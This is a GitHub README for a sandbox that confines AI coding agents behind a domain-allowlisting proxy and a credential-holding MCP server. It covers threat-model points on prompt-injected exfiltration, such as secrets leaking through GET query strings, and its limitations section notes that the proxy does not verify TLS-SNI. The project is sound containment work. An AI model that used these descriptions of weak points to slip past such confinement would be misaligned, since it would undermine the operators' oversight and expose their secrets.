Skip to content

HarshdeepGupta/managed-agent-runtime

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Managed Agent Runtime

A capability-confined sandbox for running AI coding agents in YOLO mode. Instead of trusting the agent to behave, you make harm structurally impossible. The worst a fully compromised or prompt-injected agent can do is open a pull request on a private repo — it cannot exfiltrate secrets, reach arbitrary hosts, or touch the cloud directly.

This repo is two things:

  • PROMPT.md — the brief that defines the system. This is the artifact that matters: hand it to a capable coding agent and it can build a runtime like this one. It's a refined version of the original idea with the security mistakes corrected.
  • sample-implementation/ — one working, tested implementation of that brief (Docker + Squid + a stdlib MCP server), with a test suite that proves the security properties hold.

The idea in one picture

Managed Agent Runtime architecture

  • The agent sits on an internal-only network: it has no internet route at all.
  • Its only way out is the proxy, which allows a short list of trusted domains and denies everything else. This — not an "allow GET / block POST" filter — is what actually stops exfiltration (a GET evil.com/?secret=... leaks just fine).
  • The cloud credential lives only in the MCP server. There is no az CLI in the agent, so the only path to the cloud is through MCP tools that return derived, scrubbed results. The agent never sees the secret.

See PROMPT.md for the two-layer mediation model (proxy floor + MCP high-trust lane) and the full acceptance criteria.

Running the sample implementation

cd sample-implementation

# Build and start the three containers (agent, proxy, mcp-server)
docker compose build
docker compose up -d
docker compose ps          # all three should be "Up"

# Prove the security properties (runs commands inside the agent container)
./tests/run-tests.sh

# Exec in and play the part of the agent
docker exec -it mar-agent bash
#   curl https://api.github.com/zen     # allowed
#   curl https://example.com            # blocked by the proxy
#   mcp_call azure_whoami               # cloud access without the credential
#   mcp_call web_fetch url=https://api.github.com/zen

# Watch egress decisions live
docker exec mar-proxy tail -f /var/log/squid/access.log

# Optional: give the agent a real GitHub PAT (read + create-PR, private repos)
GH_TOKEN=ghp_xxx docker compose up -d
./tests/run-tests.sh       # now also exercises GitHub access

# Tear down
docker compose down

What the test suite proves

# Property
1 Agent has no direct internet route (bypassing the proxy fails)
2 Egress is domain-allowlisted (github allowed, example.com denied)
3 The cloud credential is never visible to the agent
4 A vulnerable tool's secret leak is scrubbed by the MCP server
5 Exfiltration blocked — GET and POST to a non-allowlisted host fail
6 No az CLI in the agent; GitHub access is scoped (PAT)

Honest limitations

This is a POC that demonstrates the model, not a finished product. Notably: the proxy trusts the CONNECT hostname without TLS-SNI verification (production wants ssl_bump peek + SNI allowlisting), the MCP server is the trusted base and must be kept small and audited, and the MCP transport here is a minimal hand-rolled JSON-RPC subset rather than the official SDK over Streamable HTTP. These are called out in PROMPT.md and in code comments so they aren't mistaken for solved problems.

About

A capability-confined Docker sandbox to run AI coding agents in YOLO mode safely. Worst case it opens a PR.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors